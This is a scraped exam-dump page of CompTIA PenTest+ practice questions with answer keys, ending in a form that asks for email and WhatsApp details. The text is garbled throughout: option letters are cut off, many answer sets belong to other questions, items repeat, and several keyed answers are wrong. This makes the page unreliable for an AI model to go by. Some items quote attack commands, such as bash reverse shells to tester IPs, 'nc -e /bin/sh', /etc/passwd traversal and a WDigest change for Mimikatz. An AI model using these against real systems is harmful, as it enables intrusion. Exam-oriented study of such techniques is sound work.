DON'T WANT TO MISS A THING?

Certification Exam Passing Tips

Latest exam news and discount info

Curated and up-to-date by our experts

Yes, send me the newsletter

Updated CompTIA PenTest+ PT0-001 Exam Dumps – Your Path to Success

Preparing for the CompTIA PenTest+ PT0-001 exam with high-quality practice questions and study materials is crucial for passing successfully. Utilizing reliable exam resources that accurately reflect the real exam environment can help identify areas needing further study. Mock exams that simulate the actual test format and difficulty level allow you to gauge your readiness. Well-crafted exam questions and answers cover various penetration testing and vulnerability management topics, enabling you to reinforce your knowledge. Additionally, utilizing study guides and practice tests from reputable providers can ensure you're focusing on relevant and up-to-date exam content. By adequately preparing with comprehensive exam preparation resources, you increase your chances of confidently tackling the CompTIA PenTest+ PT0-001 certification exam.
Take other online exams

Question #1
A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?
A. tored XSS
B. ill path disclosure
C. xpired certificate
D. lickjacking
View answer
Correct Answer: A
Question #2
During an internal network penetration test, a tester recovers the NTLM password hash for a user known to have full administrator privileges on a number of target systems. Efforts to crack the hash and recover the plaintext password have been unsuccessful.Which of the following would be the BEST target for continued exploitation efforts?
A. Operating system: Windows 7 Open ports: 23, 161
B. Operating system: Windows Server 2016 Open ports: 53, 5900
C. Operating system: Windows 8
D. Operating system: Windows 8 Open ports: 514, 3389
View answer
Correct Answer: C
Question #3
A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).
A. redential dump attack
B. LL injection attack
C. everse shell attack
D. ass the hash attack
View answer
Correct Answer: CDE
Question #4
During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to impersonate network resources and collect authentication requests?
A. ttercap
B. cpdump
C. esponder
D. edusa
View answer
Correct Answer: C
Question #5
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
A. ulnerability scan
B. ynamic scan
C. tatic scan
D. ompliance scan
View answer
Correct Answer: A
Question #6
During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.Which of the following registry changes would allow for credential caching in memory?
A. eg add HKLM\\System\\ControlSet002\\Control\\SecurityProviders\\WDigest /v userLogoCredential /t REG_DWORD /d 0
B. eg add HKCU\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v userLogoCredential /t REG_DWORD /d 1
C. eg add HKLM\\Software\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v userLogoCredential /t REG_DWORD /d 1
D. eg add HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v userLogoCredential /t REG_DWORD /d 1
View answer
Correct Answer: A
Question #7
A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?
A. he latest vulnerability scan results
B. list of sample application requests
C. n up-to-date list of possible exploits
D. list of sample test accounts
View answer
Correct Answer: B
Question #8
A penetration tester executes the following commands:Which of the following is a local host vulnerability that the attacker is exploiting?
A. nsecure file permissions
B. pplication whitelisting
C. hell escape
D. ritable service
View answer
Correct Answer: A
Question #9
A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?
A. nmap -p 22 -iL targets
B. nmap -p 22 -sL targets
C. nmap -p 22 -oG targets
D. nmap -p 22 -oA targets
View answer
Correct Answer: A
Question #10
An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:
A. TTP POST method
B. TTP OPTIONS method
C. TTP PUT method
D. TTP TRACE method
View answer
Correct Answer: A
Question #11
A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL:http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswdWhich of the following attack types is MOST likely to be the vulnerability?
A. cope creep
B. ost-mortem review
C. isk acceptance
D. hreat prevention
View answer
Correct Answer: B
Question #12
An attacker uses SET to make a copy of a company’s cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO’s login credentials. Which of the following types of attacks is this an example of?
A. licitation attack
B. mpersonation attack
C. pear phishing attack
D. rive-by download attack
View answer
Correct Answer: A
Question #13
During the information gathering phase of a network penetration test for the corp.local domain, which of the following commands would provide a list of domain controllers?
A. slookup –type=srv _ldap
B. map –sV –p 389 - -script=ldap-rootdse corp
C. et group “Domain Controllers” /domain
D. presult /d corp
View answer
Correct Answer: A
Question #14
A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5. Which of the following commands will test if the VPN is available?
A. pipe
B. ke-scan -A -t 1 --sourceip=spoof_ip 100
C. map -sS -A -f 100
D. c 100
View answer
Correct Answer: B
Question #15
Click the exhibit button. A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?
A. NMP brute forcing
B. RP spoofing
C. NS cache poisoning
D. MTP relay
View answer
Correct Answer: A
Question #16
Joe, an attacker, intends to transfer funds discreetly from a victim’s account to his own. Which of the following URLs can he use to accomplish this attack?
A. ttps://testbank
B. ttps://testbank
C. ttps://testbank
D. ttps://testbank
View answer
Correct Answer: B
Question #17
If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ae0b556ba8Which of the following formats is the correct hash type?
A. Kerberos
B. NetNTLMv1
C. NTLM
D. SHA-1
View answer
Correct Answer: D
Question #18
A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
A. ownload the GHOST file to a Linux system and compilegcc -o GHOSTtest i:
B. ownload the GHOST file to a Windows system and compilegcc -o GHOST GHOST
C. ownload the GHOST file to a Linux system and compilegcc -o GHOST GHOST
D. ownload the GHOST file to a Windows system and compilegcc -o GHOSTtest i:
View answer
Correct Answer: C
Question #19
A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?
A. ommand injection attack
B. lickjacking attack
C. irectory traversal attack
D. emote file inclusion attack
View answer
Correct Answer: B
Question #20
During post-exploitation, a tester identifies that only system binaries will pass an egress filter and store a file with the following command:c: \creditcards.db>c:\winit\system32\calc.exe:creditcards.dbWhich of the following file system vulnerabilities does this command take advantage of?
A. ierarchical file system
B. lternate data streams
C. ackdoor success
D. xtended file system
View answer
Correct Answer: B
Question #21
A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?
A. map -p 22 -iL targets
B. map -p 22 -sL targets
C. map -p 22 -oG targets
D. map -p 22 -oA targets
View answer
Correct Answer: A
Question #22
A penetration tester is checking a script to determine why some basic math errors are persisting. The expected result was the program outputting “True”.Given the output from the console above, which of the following explains how to correct the errors in the script? (Choose two.)
A. OW
B. DA
C. ULA
D. PA
View answer
Correct Answer: BD
Question #23
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
A. KEY_CLASSES_ROOT
B. KEY_LOCAL_MACHINE
C. KEY_CURRENT_USER
D. KEY_CURRENT_CONFIG
View answer
Correct Answer: C
Question #24
Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).
A. AC address of the client
B. AC address of the domain controller
C. AC address of the web server
D. AC address of the gateway
View answer
Correct Answer: AE
Question #25
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?
A. rom the remote computer, run the following commands:export XHOST 192
B. rom the local computer, run the following command:ssh -L4444:127
C. rom the remote computer, run the following command:ssh -R6000:127
D. rom the local computer, run the following command:nc -l -p 6000Then, from the remote computer, run the following command:xterm | nc 192
View answer
Correct Answer: A
Question #26
Which of the following would be the BEST for performing passive reconnaissance on a target’s external domain?
A. each
B. eWL
C. penVAS
D. hodan
View answer
Correct Answer: D
Question #27
Which of the following is an example of a spear phishing attack?
A. ample SOAP messages
B. he REST API documentation
C. protocol fuzzing utility
D. n applicable XSD file
View answer
Correct Answer: A
Question #28
Which of the following BEST explains why it is important to maintain confidentially of any identified findings when performing a penetration test?
A. enetration test findings often contain company intellectual property
B. enetration test findings could lead to consumer dissatisfaction if made public
C. enetration test findings are legal documents containing privileged information
D. enetration test findings can assist an attacker in compromising a system
View answer
Correct Answer: D
Question #29
During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?
A. ocating emergency exits
B. reparing a pretext
C. houlder surfing the victim
D. ailgating the victim
View answer
Correct Answer: B
Question #30
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:-Code review-Updates to firewall settingsWhich of the following has occurred in this situation?
A. numeration of services
B. SINT gathering
C. ort scanning
D. ocial engineering
View answer
Correct Answer: A
Question #31
A penetration tester ran the following Nmap scan on a computer:nmap -aV 192.168.1.5The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH. Which of the following is the BEST explanation for what happened?
A. he organization failed to disable Telnet
B. map results contain a false positive for port 23
C. ort 22 was filtered
D. he service is running on a non-standard port
View answer
Correct Answer: A
Question #32
Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?
A. reating a scope of the critical production systems
B. etting a schedule of testing access times
C. stablishing a white-box testing engagement
D. aving management sign off on intrusive testing
View answer
Correct Answer: B
Question #33
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?
A. erform an HTTP downgrade attack
B. arvest the user credentials to decrypt traffic
C. erform an MITM attack
D. mplement a CA attack by impersonating trusted CAs
View answer
Correct Answer: A
Question #34
Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?
A. CS vendors are slow to implement adequate security controls
B. CS staff are not adequately trained to perform basic duties
C. here is a scarcity of replacement equipment for critical devices
D. here is a lack of compliance for ICS facilities
View answer
Correct Answer: B
Question #35
A penetration tester has performed a vulnerability scan of a specific host that contains a valuable database and has identified the following vulnerabilities:-XSS-HTTP DELETE method allowed-SQL injection-Vulnerable to CSRFTo which of the following should the tester give the HIGHEST priority?
A. QL injection
B. TTP DELETE method allowed
C. ulnerable to CSRF
D. SS
View answer
Correct Answer: B
Question #36
A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?
A. map -p 53 -oG dnslist
B. slookup -ns 8
C. or x in {1
D. ig -r > echo “8
View answer
Correct Answer: A
Question #37
Given the following:http://example.com/download.php?id-.../.../.../etc/passwdWhich of the following BEST describes the above attack?
A. alicious file upload attack
B. edirect attack
C. irectory traversal attack
D. nsecure direct object reference attack
View answer
Correct Answer: C
Question #38
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
A. anufacturers developing IoT devices are less concerned with security
B. t is difficult for administrators to implement the same security standards across the board
C. oT systems often lack the hardware power required by more secure solutions
D. egulatory authorities often have lower security requirements for IoT systems
View answer
Correct Answer: BC
Question #39
For which of the following reasons does a penetration tester need to have a customer’s point-of-contact information available at all times? (Choose three.)
A. SASS
B. AM database
C. ctive Directory
D. egistry
View answer
Correct Answer: ACF
Question #40
A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?
A. chtasks
B. et session server | dsquery -user | net use c$
C. owershell && set-executionpolicy unrestricted
D. eg save HKLM\\System\\CurrentControlSet\\Services\\Sv
View answer
Correct Answer: D
Question #41
A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?
A. orizontally escalate privileges
B. crape the page for hidden fields
C. nalyze HTTP response code
D. earch for HTTP headers
View answer
Correct Answer: B
Question #42
In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?
A. ommon libraries
B. onfiguration files
C. andbox escape
D. SLR bypass
View answer
Correct Answer: A
Question #43
A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).
A. bsolete software may contain exploitable components
B. eak password management practices may be employed
C. ryptographically weak protocols may be intercepted
D. eb server configurations may reveal sensitive information
View answer
Correct Answer: AB
Question #44
A penetration tester is reviewing the following output from a wireless sniffer:Which of the following can be extrapolated from the above information?
A. rinciple of fear
B. rinciple of authority
C. rinciple of scarcity
D. rinciple of likeness
E. rinciple of social proof
View answer
Correct Answer: C
Question #45
A penetration tester runs the following from a compromised ‘python -c ‘import pty;pty.spawn (“/bin/bash”) ’.Which of the following actions are the tester taking?
A. emoving the Bash history
B. pgrading the shell
C. reating a sandbox
D. apturing credentials
View answer
Correct Answer: B
Question #46
A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?
A. dvanced persistent threat
B. cript kiddie
C. acktivist
D. rganized crime
View answer
Correct Answer: B
Question #47
An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email.Which of the following types of motivation was used in this attack?
A. odify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital signing
B. mplement new training to be aware of the risks in accessing the application
C. mplement an ACL to restrict access to the application exclusively to the finance department
D. equire payroll users to change the passwords used to authenticate to the application
View answer
Correct Answer: B
Question #48
A tester intends to run the following command on a target system:bash -i >& /dev/tcp/10.2.4.6/443 0> &1Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?
A. c -nlvp 443
B. c 10
C. c -w3 10
D. c -e /bin/sh 10
View answer
Correct Answer: D
Question #49
A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the following would contain this information?
A. ules of engagement
B. equest for proposal
C. aster service agreement
D. usiness impact analysis
View answer
Correct Answer: A
Question #50
The following command is run on a Linux file system:chmod 4111 /usr/bin/sudoWhich of the following issues may be exploited now?
A. ernel vulnerabilities
B. ticky bits
C. nquoted service path
D. isconfigured sudo
View answer
Correct Answer: B
Question #51
If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ae0b556ba8Which of the following formats is the correct hash type?
A. erberos
B. etNTLMv1
C. TLM
D. HA-1
View answer
Correct Answer: D
Question #52
The following line was found in an exploited machine's history file. An attacker ran the following command:bash -i >& /dev/tcp/192.168.0.1/80 0> &1Which of the following describes what the command does?
A. ockpicking
B. gress sensor triggering
C. ock bumping
D. ock bypass
View answer
Correct Answer: C
Question #53
A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile.The security guard then audits the badge system and finds two log entries for the badge in question within the last 30 minutes. Which of the following has MOST likely occurred?
A. The badge was cloned
B. The physical access control server is malfunctioning
C. The system reached the crossover error rate
D. The employee lost the badge
View answer
Correct Answer: A
Question #54
A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?
A. Nikto
B. WAR
C. W3AF
D. Swagger
View answer
Correct Answer: D
Question #55
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
A. dsrm -users ?€DN=company
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
View answer
Correct Answer: D
Question #56
In a physical penetration tester testing scenario. the penetration tester obtains physical access to a laptop. The laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the device?
A. rute force the user’s password
B. erform an ARP spoofing attack
C. everage the BeEF framework to capture credentials
D. onduct LLMNR/NETBIOS-ns poisoning
View answer
Correct Answer: A
Question #57
In a physical penetration tester testing scenario. the penetration tester obtains physical access to a laptop. The laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the device?
A. Brute force the user?€?s password
B. Perform an ARP spoofing attack
C. Leverage the BeEF framework to capture credentials
D. Conduct LLMNR/NETBIOS-ns poisoning
View answer
Correct Answer: A
Question #58
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
A. erl -e 'use SOCKET'; $i='; $p='443;
B. sh superadmin@ -p 443
C. c -e /bin/sh 443
D. ash -i >& /dev/tcp//443 0>&1
View answer
Correct Answer: D
Question #59
Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?
A. rpspoof
B. map
C. esponder
D. urpsuite
View answer
Correct Answer: A
Question #60
Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO.)
A. pply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation
B. dentify the issues that can be remediated most quickly and address them first
C. mplement the least impactful of the critical vulnerabilities' remediations first, and then address other critical vulnerabilities
D. ix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime
View answer
Correct Answer: BD
Question #61
HOTSPOTInstructions:Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.You are a security analyst tasked with hardening a web server.You have been given a list of HTTP payloads that were flagged as malicious.Hot Area:
A. ee Explanation section for answer
View answer
Correct Answer: A
Question #62
A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in question within the last 30 minutes. Which of the following has MOST likely occurred?
A. he badge was cloned
B. he physical access control server is malfunctioning
C. he system reached the crossover error rate
D. he employee lost the badge
View answer
Correct Answer: A
Question #63
Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?
A. et rhost 192
B. un autoroute -s 192
C. b_nmap -iL /tmp/privatehosts
D. se auxiliary/server/socks4a
View answer
Correct Answer: A
Question #64
Which of the following is the purpose of an NDA?
A. utlines the terms of confidentiality between both parties
B. utlines the boundaries of which systems are authorized for testing
C. utlines the requirements of technical testing that are allowed
D. utlines the detailed configuration of the network
View answer
Correct Answer: A
Question #65
A penetration tester, who is not on the client’s network. is using Nmap to scan the network for hosts that are in scope. The penetration tester is not receiving any response on the command:nmap 100.100/1/0-125Which of the following commands would be BEST to return results?
A. map -Pn -sT 100
B. map -sF -p 100
C. map -sV -oA output 100
D. map 100
View answer
Correct Answer: A
Question #66
Given the following Python script:Which of the following is where the output will go?
A. o the screen
B. o a network server
C. o a file
D. o /dev/null
View answer
Correct Answer: C
Question #67
A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?
A. CP SYN flood
B. QL injection
C. SS
D. MAS scan
View answer
Correct Answer: B
Question #68
Which of the following would be the BEST for performing passive reconnaissance on a target?€?s external domain?
A. Peach
B. CeWL
C. OpenVAS
D. Shodan
View answer
Correct Answer: D
Question #69
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
A. tack pointer register
B. ndex pointer register
C. tack base pointer
D. estination index register
View answer
Correct Answer: A

View Answers after Submission

Please submit your email and WhatsApp to get the answers of questions.

Note: Please make sure your email ID and Whatsapp are valid so that you can get the correct exam results.

Email:
Whatsapp/phone number: